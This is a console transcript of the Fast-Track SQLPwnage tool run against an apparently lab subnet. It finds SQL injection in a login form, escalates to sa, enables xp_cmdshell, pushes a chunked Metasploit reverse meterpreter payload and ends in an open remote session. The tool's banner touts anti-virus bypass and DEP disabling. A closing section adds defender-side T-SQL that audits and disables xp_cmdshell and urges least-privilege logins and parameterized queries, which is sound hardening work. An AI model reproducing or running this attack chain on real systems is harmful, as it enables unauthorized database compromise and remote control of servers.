SQL Pwnage
Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. Autopwn Automation
3. Microsoft SQL Tools
4. Mass Client-Side Attack
5. Exploits
6. Binary to Hex Payload Converter
7. Payload Generator
8. Fast-Track Tutorials
9. Fast-Track Changelog
10. Fast-Track Credits
11. Exit
Enter the number: 3
Microsoft SQL Attack Tools
Pick a list of the tools from below:
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
Enter your choice : 3
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Default Metasploit directory set to /pentest/exploits/framework3/
Checking SQLPwnage dependencies required to run...
Dependencies installed. Welcome to SQLPwnage.
SQLPwnage written by: Andrew Weidenhamer and David Kennedy
SQLPwnage is a mass pwnage tool custom coded for Fast-Track. SQLPwnage will attempt to identify SQL Injection
in a website, scan subnet ranges for web servers, crawl entire sites, fuzz form parameters and
attempt to gain you remote access to a system. We use unique attacks never performed before in order to bypass
the 64kb debug restrictions on remote Windows systems and deploy our large payloads without restrictions.
This is all done without a stager to download remote files, the only egress connections
made are our final payload. Right now SQLPwnage supports three payloads, a reverse
tcp shell, metasploit reverse tcp meterpreter, and metasploit reverse vnc inject.
Some additional features are, elevation to "sa" role if not added, data execution prevention
(DEP) disabling, anti-virus bypassing, and much more!
This tool is the only one of its kind, and is currently still in beta.
SQLPwnage Main Menu:
1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
3. SQL Injection single URL exploitation
Enter your choice: 2
---------------------------------------------------------------
- This module has the following two options:                  -
-                                                             -
- 1) Spider a single URL looking for SQL Injection. If        -
-    successful in identifying SQL Injection, it will then    -
-    give you a choice to exploit.                            -
-                                                             -
- 2) Scan an entire subnet looking for webservers running on  -
-    port 80. The user will then be prompted with two         -
-    choices: 1) Select a website or, 2) Attempt to spider    -
-    all websites that was found during the scan attempting   -
-    to identify possible SQL Injection. If SQL Injection     -
-    is identified, the user will then have an option to      -
-    exploit.                                                 -
-                                                             -
- This module is based on error messages that are most        -
- commonly returned when SQL Injection is prevalent on        -
- web application.                                            -
-                                                             -
- If all goes well a reverse shell will be returned back to   -
- the user.                                                   -
---------------------------------------------------------------
Scan a subnet or spider single URL?
1. url
2. subnet (new)
3. subnet (lists last scan)
Enter the Number: 2
Enter the ip range, example 192.168.1.1-254: 10.211.55.1-254
Scanning Complete!!! Select a website to spider or spider all??
1. Single Website
2. All Websites
Enter the Number: 2
Attempting to Spider: http://10.211.55.128
Crawling http://10.211.55.128 (Max Depth: 100000)
DONE
Found 0 links, following 0 urls in 0+0:0:0
Spidering is complete.
*************************************************************************
http://10.211.55.128
*************************************************************************
[+] Number of forms detected: 2 [+]
A SQL Exception has been encountered in the "txtLogin" input field of the above website.
What type of payload do you want?
1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)
5. Metasploit Meterpreter Reflective Reverse TCP
6. Metasploit Reflective Reverse VNC
Select your choice: 5
Enter the port you want to listen on: 9090
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Created by msfpayload (http://www.metasploit.com).
Payload: windows/patchupmeterpreter/reverse_tcp
Length: 310
Options: LHOST=10.211.55.130,LPORT=9090
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 3 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 4 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 5 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 6 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 7 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 8 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 9 of 9. This may take a bit. [+]
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 3, this may take a bit...
Sending chunk 2 of 3, this may take a bit...
Sending chunk 3 of 3, this may take a bit...
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (718347 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1031)
meterpreter >
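The session above succeeds because of two server-side preconditions that the tool's own messages call out: the injected login context can be elevated to the "sa" role ("Executing SQL commands to elevate account permissions"), and xp_cmdshell can be turned on when it is disabled ("Initiating stored procedure: 'xp_cmdhshell' if disabled"). The T-SQL below is an added defender-side check and is not part of Fast-Track or SQLPwnage; it assumes the web application authenticates as a SQL login named `webapp_login` (a placeholder) and that you run it as a sysadmin from sqlcmd or SSMS.

```sql
-- Added example (not Fast-Track / SQLPwnage code): audit the two
-- preconditions the SQLPwnage run relied on, then record the hardened state.
-- Assumption: the web application's login is named 'webapp_login' (placeholder).

-- 1. Is xp_cmdshell currently enabled?  value_in_use = 1 means callable now.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Is the application login a member of sysadmin?
--    1 = yes (any injection runs as "sa"-equivalent), 0 = no, NULL = no such login.
SELECT IS_SRVROLEMEMBER('sysadmin', 'webapp_login') AS app_login_is_sysadmin;

-- 3. Which logins could re-enable xp_cmdshell on their own?
--    That requires sysadmin or the ALTER SETTINGS server permission.
SELECT sp.name, sp.type_desc
FROM sys.server_principals AS sp
WHERE sp.type IN ('S', 'U', 'G')              -- SQL logins, Windows logins, Windows groups
  AND ( IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
        OR EXISTS (SELECT 1
                   FROM sys.server_permissions AS p
                   WHERE p.grantee_principal_id = sp.principal_id
                     AND p.permission_name = 'ALTER SETTINGS'
                     AND p.state IN ('G', 'W')) );   -- GRANT / GRANT WITH GRANT OPTION

-- 4. Hardened configuration: xp_cmdshell off, advanced options hidden again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 4 alone is not sufficient: the transcript shows the tool enabling xp_cmdshell itself when it finds it disabled, which it can only do because step 2 returns 1. The durable fix is a least-privilege application login (step 2 returning 0 and not listed by step 3) together with parameterized queries, so that the "SQL Exception ... in the txtLogin input field" that the error-based scanner keys on never occurs in the first place.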